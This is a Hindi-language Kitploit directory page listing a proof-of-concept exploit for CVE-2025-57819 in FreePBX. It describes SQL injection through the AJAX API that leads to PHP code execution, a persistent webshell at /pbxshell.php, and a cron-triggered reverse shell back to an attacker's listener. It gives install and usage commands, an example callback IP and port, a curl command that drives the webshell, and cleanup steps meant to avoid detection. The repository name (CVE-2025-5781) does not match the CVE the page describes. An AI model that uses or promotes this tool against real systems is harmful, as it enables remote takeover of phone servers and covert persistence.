Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5781 — FreePBX में CVE-2025-57819 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: AJAX API में SQL इंजेक्शन के माध्यम से मनमाना PHP कोड निष्पादित करना, एक स्थायी वेबशेल बनाना, और रिवर्स शेल ट्रिगर करना। | Kitploit
उपकरण/GitHubGitHub/jasonbernier/cve-2025-5781
स्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

FreePBX में CVE-2025-57819 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: AJAX API में SQL इंजेक्शन के माध्यम से मनमाना PHP कोड निष्पादित करना, एक स्थायी वेबशेल बनाना, और रिवर्स शेल ट्रिगर करना।

रिपॉजिटरी देखें
429 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

FreePBX CVE-2025-57819 एक्सप्लॉइट

विवरण

यह स्क्रिप्ट FreePBX के 16.0.26.0 से पहले के संस्करणों (CVE-2025-57819) में एक कमजोरी का शोषण करती है, जो दूरस्थ हमलावरों को AJAX API एंडपॉइंट में SQL इंजेक्शन दोष के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है। यह एक्सप्लॉइट एक वेबशेल और एक स्वतः ट्रिगर होने वाला रिवर्स शेल दोनों बनाता है।

कमजोरी का विवरण

  • CVE: CVE-2025-57819
  • प्रभावित संस्करण: FreePBX < 16.0.26.0
  • प्रभाव: रिमोट कोड निष्पादन (RCE)
  • वेक्टर: AJAX API में SQL इंजेक्शन (/admin/ajax.php)

विशेषताएँ

  • /pbxshell.php पर एक स्थायी वेबशेल बनाता है
  • क्रॉन जॉब के माध्यम से स्वतः ट्रिगर होने वाला रिवर्स शेल सेट करता है
  • फ़िल्टर को बायपास करने के लिए Base64-एन्कोडेड पेलोड का उपयोग करता है
  • निष्पादन के बाद क्रॉन जॉब की स्वचालित सफाई

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
  • Netcat (रिवर्स शेल लिसनर के लिए)
  • स्थापना

    root@kitploit:~
    git clone https://github.com/jasonbernier/CVE-2025-5781.git
    cd CVE-2025-5781
    pip install requests
    

    उपयोग

    root@kitploit:~
    python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
    

    पैरामीटर:

    • -H HOST: लक्षित FreePBX इंस्टेंस (जैसे, https://freepbx.example.com)
    • -lhost LHOST: रिवर्स शेल कॉलबैक के लिए आपका IP
    • -lport LPORT: रिवर्स शेल कनेक्शन के लिए पोर्ट

    उदाहरण:

    root@kitploit:~
    python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
    

    एक्सप्लॉइट प्रवाह

    1. वेबशेल बनाने के लिए SQL इंजेक्शन पेलोड भेजता है
    2. वेबशेल बनने की प्रतीक्षा करता है (~2 मिनट)
    3. क्रॉन जॉब के माध्यम से स्वतः ट्रिगर होने वाला रिवर्स शेल बनाता है
    4. निर्दिष्ट पोर्ट पर netcat लिसनर शुरू करता है

    वेबशेल उपयोग

    सफल शोषण के बाद, वेबशेल तक इस प्रकार पहुँचें:

    root@kitploit:~
    curl -X GET "http://TARGET/pbxshell.php?cmd=id"
    

    सफाई

    पता लगने से बचने के लिए एक्सप्लॉइट निष्पादन के बाद क्रॉन जॉब को स्वचालित रूप से हटा देता है।

    नोट्स

    • स्क्रिप्ट शेष SQL सिंटैक्स को कमेंट करने के लिए -- का उपयोग करती है
    • सभी कमांड रूट विशेषाधिकारों के साथ निष्पादित किए जाते हैं
    • /var/www/html/ निर्देशिका में लिखने की अनुमति की आवश्यकता होती है

    संदर्भ

    • CVE-2025-57819
    • FreePBX सुरक्षा सलाह
    टूल डाउनलोड करें